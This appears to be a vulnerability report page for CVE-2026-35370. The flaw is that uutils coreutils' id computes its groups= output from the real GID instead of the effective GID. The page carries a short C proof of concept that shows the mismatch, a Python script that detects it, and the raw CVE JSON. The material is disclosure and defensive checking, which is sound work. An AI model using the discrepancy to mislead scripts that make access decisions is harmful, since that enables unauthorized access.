Security Vulnerability Report
CVE-2026-35370 CVSS 4.4 MEDIUM

CVE-2026-35370

Published: 2026-04-22 17:16:41
Last Modified: 2026-05-04 20:02:44

Description

The id utility in uutils coreutils miscalculates the groups= section of its output. The implementation uses a user's real GID instead of their effective GID to compute the group list, leading to potentially divergent output compared to GNU coreutils. Because many scripts and automated processes rely on the output of id to make security-critical access-control or permission decisions, this discrepancy can lead to unauthorized access or security misconfigurations.
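As an added worked example (not part of this record or of the uutils project), the following Python script builds the groups= list the way the description says GNU id does, effective GID first and then the supplementary groups with duplicates removed, builds the real-GID-based list the report attributes to the affected version, reports which groups the two lists disagree on, and can compare the id binary on PATH against the running process's own credentials. The order of supplementary groups is taken from os.getgroups() as an assumption, so the live check compares membership rather than order; the uid/gid values in the sample are constructed.

```python
"""Added example for the groups= discrepancy described in CVE-2026-35370.
Not code from the CVE record or from uutils; sample GIDs are constructed."""
import os
import re
import subprocess


def groups_section(primary_gid, supplementary):
    """Return the groups= list: the primary GID first, then the supplementary
    GIDs in the order given, with duplicates removed. On Linux getgroups()
    does not necessarily contain the effective GID, which is why prepending
    and deduplicating matters."""
    seen = set()
    result = []
    for gid in [primary_gid, *supplementary]:
        if gid not in seen:
            seen.add(gid)
            result.append(gid)
    return result


def compare_groups(rgid, egid, supplementary):
    """Build the expected (effective-GID-based) list and the divergent
    (real-GID-based) list the report describes, and list the differences."""
    expected = groups_section(egid, supplementary)   # GNU coreutils behaviour
    divergent = groups_section(rgid, supplementary)  # the reported defect
    return {
        "expected": expected,
        "divergent": divergent,
        "missing_from_divergent": [g for g in expected if g not in divergent],
        "extra_in_divergent": [g for g in divergent if g not in expected],
    }


_GROUPS_RE = re.compile(r"\bgroups=(\S+)")


def parse_groups_field(id_output):
    """Extract the numeric GIDs from the groups= field of `id` output.
    Handles both '1001(staff),1000(alice)' and bare '1001,1000' forms;
    returns [] when the field is absent."""
    match = _GROUPS_RE.search(id_output)
    if not match:
        return []
    return [int(entry.split("(", 1)[0]) for entry in match.group(1).split(",")]


def check_installed_id(id_path="id"):
    """Run the id binary on PATH and compare the groups it reports with the
    list derived from this process's own credentials (order-insensitive).
    Returns (matches, expected, observed)."""
    expected = groups_section(os.getegid(), os.getgroups())
    output = subprocess.run([id_path], capture_output=True, text=True,
                            check=True).stdout
    observed = parse_groups_field(output)
    return set(observed) == set(expected), expected, observed


if __name__ == "__main__":
    # Constructed scenario: real GID 1000, effective GID 1001, supplementary
    # groups 1000 and 27. The effective group is absent from the divergent list.
    report = compare_groups(rgid=1000, egid=1001, supplementary=[1000, 27])
    for key, value in report.items():
        print(f"{key}: {value}")

    ok, exp, obs = check_installed_id()
    print("installed id agrees with process credentials:", ok)
    if not ok:
        print("expected:", exp, "observed:", obs)
```

The mitigation the record points at is on the consumer side as much as in id itself: a script that needs to make an access decision should read the process credentials directly (os.getegid(), os.getgroups(), or their libc equivalents) instead of parsing the text that id prints, and check_installed_id is the quick way to see whether the id on a given host diverges from those credentials.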

CVSS Details

CVSS Score
4.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:uutils:coreutils:-:*:*:*:*:rust:*:* - VULNERABLE
uutils coreutils (versions before the fix)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
C
#include <stdio.h>
#include <stdlib.h>   /* needed for system() */
#include <unistd.h>
#include <sys/types.h>

/*
 * PoC for CVE-2026-35370
 * This C program demonstrates the discrepancy between Real GID and Effective GID.
 * Compile with: gcc poc.c -o poc
 * Run with: ./poc
 */
int main(void) {
    // Assume we want to test membership in group 1001 (effective GID).
    // setegid() fails with EPERM unless the caller is privileged or 1001 is
    // the process's real or saved set-group-ID.
    gid_t target_egid = 1001;
    if (setegid(target_egid) != 0) {
        perror("Failed to set Effective GID");
        return 1;
    }

    printf("[+] Process Info:\n");
    printf("  Real GID: %d\n", (int)getgid());
    printf("  Effective GID: %d\n", (int)getegid());

    printf("\n[!] Running 'id' command (vulnerable uutils version):\n");
    // The vulnerable 'id' will calculate groups based on Real GID (getgid())
    // instead of Effective GID (getegid()), potentially missing 'target_egid'.
    system("id");
    return 0;
}

References

https://github.com/uutils/coreutils/issues/10006 (Exploit, Issue Tracking)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-35370",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-22T17:16:40.833",
    "lastModified": "2026-05-04T20:02:44.330",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The id utility in uutils coreutils miscalculates the groups= section of its output. The implementation uses a user's real GID instead of their effective GID to compute the group list, leading to potentially divergent output compared to GNU coreutils. Because many scripts and automated processes rely on the output of id to make security-critical access-control or permission decisions, this discrepancy can lead to unauthorized access or security misconfigurations."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
            "baseScore": 4.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-863"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:uutils:coreutils:-:*:*:*:*:rust:*:*",
                "matchCriteriaId": "4A9AF9E4-E17C-48AD-8051-B49998618839"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/uutils/coreutils/issues/10006",
        "source": "[email protected]",
        "tags": ["Exploit", "Issue Tracking"]
      },
      {
        "url": "https://github.com/uutils/coreutils/issues/10006",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["Exploit", "Issue Tracking"]
      }
    ]
  }
}